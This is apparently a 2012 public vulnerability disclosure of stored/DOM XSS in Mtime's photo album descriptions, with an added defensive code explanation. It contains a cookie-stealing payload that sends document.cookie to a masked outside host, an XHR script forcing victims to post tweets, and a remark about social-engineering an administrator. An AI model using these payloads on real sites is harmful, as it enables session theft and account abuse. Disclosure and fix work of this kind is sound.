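2012-08-29: Details reported to the vendor; awaiting vendor handling.
2012-09-03: The vendor has actively ignored the vulnerability; details disclosed to the public.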
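Two stored XSS issues on Mtime. Hoping for a gift.
Go to the album at http://my.mtime.com/app/album/ and publish a photo.
Then let's add a description.
Two places with DOM XSS...
http://i.mtime.com/6912275/tag/photo/xss.html
http://i.mtime.com/6912275/photo/6359464/
The code is all escaped in the source, so it must be going through innerHTML.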
<a href="http://i.mtime.com/6912275/photo/6359464/" title="<script>alert(/xss1/)</script>"><img src="http://img32.mtime.cn/up/2012/08/29/132120.28194126_160X160.jpg" alt="<script>alert(/xss1/)</script>"></a>
Shall we steal some cookies for fun?
<script/src=//xxxxx/uploads/c.js>
document.write('<iframe id="rc" width="0" height="0"></iframe><script>document.getElementById("rc").src="http://xxxxxxxxxx/uploads/c.php?c="+document.cookie;</script>');
(Already emailing and texting to social-engineer the administrator...) Let's do a bit of promotion as well.
http://service.mtime.com/Service/Twitter.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.TwitterService&Ajax_CallBackMethod=PostTweetCrossDomainByFlash&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2F&t=20128291344973966&Ajax_CallBackArgument0=HJMJJ%20for%20wooyun%20&Ajax_CallBackArgument1=&Ajax_CallBackArgument2=0&Ajax_CallBackArgument3=1&Ajax_CallBackArgument4=0&Ajax_CallBackArgument5=0&Ajax_CallBackArgument6=0&Ajax_CallBackArgument7=0
var request = false;
if (window.XMLHttpRequest) {
    request = new XMLHttpRequest();
    if (request.overrideMimeType) {
        request.overrideMimeType('text/xml');
    }
} else if (window.ActiveXObject) {
    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
    for (var i = 0; i < versions.length; i++) {
        try {
            request = new ActiveXObject(versions[i]);
        } catch (e) {}
    }
}
xmlhttp = request;
ajax();
function ajax() {
    var url = "http://service.mtime.com/Service/Twitter.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.TwitterService&Ajax_CallBackMethod=PostTweetCrossDomainByFlash&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2F&t=20128291344973966&Ajax_CallBackArgument0=HJMJJ%20for%20wooyun%20&Ajax_CallBackArgument1=&Ajax_CallBackArgument2=0&Ajax_CallBackArgument3=1&Ajax_CallBackArgument4=0&Ajax_CallBackArgument5=0&Ajax_CallBackArgument6=0&Ajax_CallBackArgument7=0"; // request URL
    xmlhttp.open("get", url, true);
}
Short and sharp.
See the detailed description.
Escape these as well: &# \/
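The author's guess above is that the description is escaped in the page source but later passes through innerHTML. As an added example (not code from the report or from Mtime), this sketch shows why escaping only in the served markup is insufficient when script reads the decoded attribute and re-inserts it as HTML, and how encoding at the sink, including the & # \ / characters named in the fix, closes the gap. All function names are hypothetical, and the browser's attribute decoding is simulated so the block runs under Node.

```javascript
// Added example: helper names are hypothetical, not Mtime's code.
// Constructed sample: the photo description value quoted in the report.
const description = '<script>alert(/xss1/)</script>';

// Encode for HTML text and quoted-attribute contexts. Covers the
// characters the report asks for (& # \ /) beyond the usual < > " '.
function escapeHtml(s) {
  return String(s).replace(/[&<>"'`=\/\\#]/g, (c) => '&#' + c.charCodeAt(0) + ';');
}

// Simulates what a browser returns from element.title or
// getAttribute('title'): numeric character references are decoded.
function decodeNumericEntities(s) {
  return s.replace(/&#(\d+);/g, (_, n) => String.fromCharCode(Number(n)));
}

// Server side: the attribute is escaped correctly in the page source.
function renderAnchor(desc) {
  return '<a title="' + escapeHtml(desc) + '">photo</a>';
}

// Unsafe client pattern: decoded attribute text is concatenated into a
// string that is later assigned to innerHTML, so the markup is live again.
function tooltipUnsafe(titleAttr) {
  return '<div class="tip">' + decodeNumericEntities(titleAttr) + '</div>';
}

// Safer pattern: re-encode at the sink (in a real DOM, use textContent).
function tooltipSafe(titleAttr) {
  return '<div class="tip">' + escapeHtml(decodeNumericEntities(titleAttr)) + '</div>';
}

const source = renderAnchor(description);
const titleAttr = source.match(/title="([^"]*)"/)[1];
console.log(source);                   // escaped in "view source"
console.log(tooltipUnsafe(titleAttr)); // raw <script> tag reappears
console.log(tooltipSafe(titleAttr));   // stays inert text
```

In a browser the safe path is simply `node.textContent = anchor.title`; the string version here only makes the difference visible without a DOM.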
Severity: no impact, ignored by vendor
Ignored at: 2012-09-03 14:07
None yet